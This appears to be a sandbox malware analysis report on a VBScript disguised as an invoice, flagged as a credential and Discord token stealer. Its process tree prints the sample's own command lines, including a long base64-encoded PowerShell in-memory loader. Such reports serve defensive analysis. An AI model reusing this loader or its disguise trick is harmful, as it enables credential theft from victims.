Edit tour
Windows
Analysis Report
Fattura-24SC-99245969925904728562.vbs
Overview
General Information
Detection
Discord Token Stealer
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected Discord Token Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Creates processes via WMI
Drops VBS files to the startup folder
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: PowerShell Script Run in AppData
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7560 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Fattu ra-24SC-99 2459699259 04728562.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - Fattura-24SC-99245969925904728562.vbs.exe (PID: 7764 cmdline:
"C:\Users\ user\Deskt op\Fattura -24SC-9924 5969925904 728562.vbs .exe" -enc JABGAHAAd ABqAHgAcgB 4AGkAIAA9A CAAWwBTAHk AcwB0AGUAb QAuAEQAaQB hAGcAbgBvA HMAdABpAGM AcwAuAFAAc gBvAGMAZQB zAHMAXQA6A DoARwBlAHQ AQwB1AHIAc gBlAG4AdAB QAHIAbwBjA GUAcwBzACg AKQAuAE0AY QBpAG4ATQB vAGQAdQBsA GUALgBGAGk AbABlAE4AY QBtAGUALgB SAGUAcABsA GEAYwBlACg AJwAuAGUAe ABlACcALAA nACcAKQA7A CQATgBrAGw AcwBlAHgAd AAgAD0AIAB nAGUAdAAtA GMAbwBuAHQ AZQBuAHQAI AAkAEYAcAB 0AGoAeAByA HgAaQAgAHw AIABTAGUAb ABlAGMAdAA tAE8AYgBqA GUAYwB0ACA ALQBMAGEAc wB0ACAAMQA 7ACAAJABaA G8AaQBsAGU AdwBmAGMAI AA9ACAAWwB TAHkAcwB0A GUAbQAuAEM AbwBuAHYAZ QByAHQAXQA 6ADoARgByA G8AbQBCAGE AcwBlADYAN ABTAHQAcgB pAG4AZwAoA CQATgBrAGw AcwBlAHgAd AAuAFIAZQB wAGwAYQBjA GUAKAAnAFI ARQBNACAAJ wAsACAAJwA nACkALgBSA GUAcABsAGE AYwBlACgAJ wBAACcALAA gACcAQQAnA CkAKQA7ACQ AWgBwAHEAb ABxAGEAegB pAGEAIAA9A CAATgBlAHc ALQBPAGIAa gBlAGMAdAA gAFMAeQBzA HQAZQBtAC4 ASQBPAC4AT QBlAG0AbwB yAHkAUwB0A HIAZQBhAG0 AKAAgACwAI AAkAFoAbwB pAGwAZQB3A GYAYwAgACk AOwAkAEQAa wBtAGIAcAA gAD0AIABOA GUAdwAtAE8 AYgBqAGUAY wB0ACAAUwB 5AHMAdABlA G0ALgBJAE8 ALgBNAGUAb QBvAHIAeQB TAHQAcgBlA GEAbQA7ACQ ASQB2AHkAZ wB5AG8AcwB 2ACAAPQAgA E4AZQB3AC0 ATwBiAGoAZ QBjAHQAIAB TAHkAcwB0A GUAbQAuAEk ATwAuAEMAb wBtAHAAcgB lAHMAcwBpA G8AbgAuAEc AegBpAHAAU wB0AHIAZQB hAG0AIAAkA FoAcABxAGw AcQBhAHoAa QBhACwAIAA oAFsASQBPA C4AQwBvAG0 AcAByAGUAc wBzAGkAbwB uAC4AQwBvA G0AcAByAGU AcwBzAGkAb wBuAE0AbwB kAGUAXQA6A DoARABlAGM AbwBtAHAAc gBlAHMAcwA pADsAJABJA HYAeQBnAHk AbwBzAHYAL gBDAG8AcAB 5AFQAbwAoA CAAJABEAGs AbQBiAHAAI AApADsAJAB JAHYAeQBnA HkAbwBzAHY ALgBDAGwAb wBzAGUAKAA pADsAJABaA HAAcQBsAHE AYQB6AGkAY QAuAEMAbAB vAHMAZQAoA CkAOwBbAGI AeQB0AGUAW wBdAF0AIAA kAFoAbwBpA GwAZQB3AGY AYwAgAD0AI AAkAEQAawB tAGIAcAAuA FQAbwBBAHI AcgBhAHkAK AApADsAWwB BAHIAcgBhA HkAXQA6ADo AUgBlAHYAZ QByAHMAZQA oACQAWgBvA GkAbABlAHc AZgBjACkAO wAgACQAUAB tAGsAZgBxA CAAPQAgAFs AUwB5AHMAd ABlAG0ALgB BAHAAcABEA G8AbQBhAGk AbgBdADoAO gBDAHUAcgB yAGUAbgB0A EQAbwBtAGE AaQBuAC4AT ABvAGEAZAA oACQAWgBvA GkAbABlAHc AZgBjACkAO wAgACQAWgB 5AHMAeAB4A GUAeABnAHE AbwAgAD0AI AAkAFAAbQB rAGYAcQAuA EUAbgB0AHI AeQBQAG8Aa QBuAHQAOwA gAFsAUwB5A HMAdABlAG0 ALgBEAGUAb ABlAGcAYQB 0AGUAXQA6A DoAQwByAGU AYQB0AGUAR ABlAGwAZQB nAGEAdABlA CgAWwBBAGM AdABpAG8Ab gBdACwAIAA kAFoAeQBzA HgAeABlAHg AZwBxAG8AL gBEAGUAYwB sAGEAcgBpA G4AZwBUAHk AcABlACwAI AAkAFoAeQB zAHgAeABlA HgAZwBxAG8 ALgBOAGEAb QBlACkALgB EAHkAbgBhA G0AaQBjAEk AbgB2AG8Aa wBlACgAKQA gAHwAIABPA HUAdAAtAE4 AdQBsAGwA MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7772 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - InstallUtil.exe (PID: 7928 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Ins tallUtil.e xe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
- cmd.exe (PID: 7636 cmdline:
cmd /c cop y "C:\Wind ows\SysWOW 64\Windows PowerShell \v1.0\powe rshell.exe " "C:\User s\user\Des ktop\Fattu ra-24SC-99 2459699259 04728562.v bs.exe" /Y MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7644 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 8168 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\Micro soft\Windo ws\Start M enu\Progra ms\Startup \OSDescrip tion.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - wscript.exe (PID: 968 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\OSDes cription.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 6964 cmdline:
cmd /c cop y "C:\Wind ows\SysWOW 64\Windows PowerShell \v1.0\powe rshell.exe " "C:\User s\user\App Data\Roami ng\OSDescr iption.vbs .exe" /Y MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6244 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - OSDescription.vbs.exe (PID: 6024 cmdline:
"C:\Users\ user\AppDa ta\Roaming \OSDescrip tion.vbs.e xe" -enc J ABGAHAAdAB qAHgAcgB4A GkAIAA9ACA AWwBTAHkAc wB0AGUAbQA uAEQAaQBhA GcAbgBvAHM AdABpAGMAc wAuAFAAcgB vAGMAZQBzA HMAXQA6ADo ARwBlAHQAQ wB1AHIAcgB lAG4AdABQA HIAbwBjAGU AcwBzACgAK QAuAE0AYQB pAG4ATQBvA GQAdQBsAGU ALgBGAGkAb ABlAE4AYQB tAGUALgBSA GUAcABsAGE AYwBlACgAJ wAuAGUAeAB lACcALAAnA CcAKQA7ACQ ATgBrAGwAc wBlAHgAdAA gAD0AIABnA GUAdAAtAGM AbwBuAHQAZ QBuAHQAIAA kAEYAcAB0A GoAeAByAHg AaQAgAHwAI ABTAGUAbAB lAGMAdAAtA E8AYgBqAGU AYwB0ACAAL QBMAGEAcwB 0ACAAMQA7A CAAJABaAG8 AaQBsAGUAd wBmAGMAIAA 9ACAAWwBTA HkAcwB0AGU AbQAuAEMAb wBuAHYAZQB yAHQAXQA6A DoARgByAG8 AbQBCAGEAc wBlADYANAB TAHQAcgBpA G4AZwAoACQ ATgBrAGwAc wBlAHgAdAA uAFIAZQBwA GwAYQBjAGU AKAAnAFIAR QBNACAAJwA sACAAJwAnA CkALgBSAGU AcABsAGEAY wBlACgAJwB AACcALAAgA CcAQQAnACk AKQA7ACQAW gBwAHEAbAB xAGEAegBpA GEAIAA9ACA ATgBlAHcAL QBPAGIAagB lAGMAdAAgA FMAeQBzAHQ AZQBtAC4AS QBPAC4ATQB lAG0AbwByA HkAUwB0AHI AZQBhAG0AK AAgACwAIAA kAFoAbwBpA GwAZQB3AGY AYwAgACkAO wAkAEQAawB tAGIAcAAgA D0AIABOAGU AdwAtAE8AY gBqAGUAYwB 0ACAAUwB5A HMAdABlAG0 ALgBJAE8AL gBNAGUAbQB vAHIAeQBTA HQAcgBlAGE AbQA7ACQAS QB2AHkAZwB 5AG8AcwB2A CAAPQAgAE4 AZQB3AC0AT wBiAGoAZQB jAHQAIABTA HkAcwB0AGU AbQAuAEkAT wAuAEMAbwB tAHAAcgBlA HMAcwBpAG8 AbgAuAEcAe gBpAHAAUwB 0AHIAZQBhA G0AIAAkAFo AcABxAGwAc QBhAHoAaQB hACwAIAAoA FsASQBPAC4 AQwBvAG0Ac AByAGUAcwB zAGkAbwBuA C4AQwBvAG0 AcAByAGUAc wBzAGkAbwB uAE0AbwBkA GUAXQA6ADo ARABlAGMAb wBtAHAAcgB lAHMAcwApA DsAJABJAHY AeQBnAHkAb wBzAHYALgB DAG8AcAB5A FQAbwAoACA AJABEAGsAb QBiAHAAIAA pADsAJABJA HYAeQBnAHk AbwBzAHYAL gBDAGwAbwB zAGUAKAApA DsAJABaAHA AcQBsAHEAY QB6AGkAYQA uAEMAbABvA HMAZQAoACk AOwBbAGIAe QB0AGUAWwB dAF0AIAAkA FoAbwBpAGw AZQB3AGYAY wAgAD0AIAA kAEQAawBtA GIAcAAuAFQ AbwBBAHIAc gBhAHkAKAA pADsAWwBBA HIAcgBhAHk AXQA6ADoAU gBlAHYAZQB yAHMAZQAoA CQAWgBvAGk AbABlAHcAZ gBjACkAOwA gACQAUABtA GsAZgBxACA APQAgAFsAU wB5AHMAdAB lAG0ALgBBA HAAcABEAG8 AbQBhAGkAb gBdADoAOgB DAHUAcgByA GUAbgB0AEQ AbwBtAGEAa QBuAC4ATAB vAGEAZAAoA CQAWgBvAGk AbABlAHcAZ gBjACkAOwA gACQAWgB5A HMAeAB4AGU AeABnAHEAb wAgAD0AIAA kAFAAbQBrA GYAcQAuAEU AbgB0AHIAe QBQAG8AaQB uAHQAOwAgA FsAUwB5AHM AdABlAG0AL gBEAGUAbAB lAGcAYQB0A GUAXQA6ADo AQwByAGUAY QB0AGUARAB lAGwAZQBnA GEAdABlACg AWwBBAGMAd ABpAG8AbgB dACwAIAAkA FoAeQBzAHg AeABlAHgAZ wBxAG8ALgB EAGUAYwBsA GEAcgBpAG4 AZwBUAHkAc ABlACwAIAA kAFoAeQBzA HgAeABlAHg AZwBxAG8AL gBOAGEAbQB lACkALgBEA HkAbgBhAG0 AaQBjAEkAb gB2AG8AawB lACgAKQAgA HwAIABPAHU AdAAtAE4Ad QBsAGwA MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 6196 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - InstallUtil.exe (PID: 2980 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Ins tallUtil.e xe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
Click to see the 19 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |